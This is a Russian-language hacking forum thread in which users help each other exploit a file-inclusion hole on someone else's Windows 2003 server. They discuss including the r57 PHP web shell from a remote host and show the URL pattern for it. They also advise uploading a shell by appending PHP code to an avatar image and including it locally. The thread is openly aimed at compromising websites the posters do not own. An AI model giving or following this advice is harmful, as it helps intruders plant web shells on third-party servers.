![]() |
Несколько моментов про инклюды
Нашел на сервере скрипт, позволяющий просматривать любые файлы на сервере и инклудить php скрипты. Попытался инклудить r57 шелл с сайта на fatal.ru, но почему-то не получилось. На сервере стоит Windows 2003 server. Не подскажете что можно в данном случае сделать?
|
значит плохо пытался, пытайся лучше, р57 ничем не хуже других пхп, и вообще если у тя не получаеца залить, с чего ты взял что вообще можно пхп инк делать?
|
Ну если позволяет инклудить это очень хорошо. Кстати, не приходило в голову что инклуд может быть локальным, позтому конструкция http://site.ru/file=http://othersite.ru/r57.php не работает. Залей php шелл на тот сервис, можт там есть форум или можно подгружать файлы.
|
Constantine дело говорит, просто иногда перед тем как инклудить скрипт или файл, сначала проверяют его существование, поэтому инклудить можно только локально... если есть на сайте форум и можно грузить аватары с компа, то берёшь картинку открываешь в блокноте и в конец добавляешь пхп код, грузишь и инклудишь - вуаля. правда не везде покатит, но как вариант
|
Так, а мне вот интересно, мой шелл нафига трогать и палить, а?
|
Меня больше другое волнует. Когда, я допустим, инклудю пхпшник, в котором, к примеру выполняется только phpinfo(), он мне выдает результат не от того сайта, который я пытаюсь взломать, а от того, на котором залит пхпшник. Почему же он все таки выполняется на втором сайте а не на аттакуемом?
|
Ну это фиг знает, значит это не инклуд, либо ты что-то перепутал...
|
2 Dark_G
видимо это не инклуд, а просто редирект на другую страничку. Такая фигня на вэб каталогах есть |
Цитата:
|
Цитата:
|
| Время: 05:15 |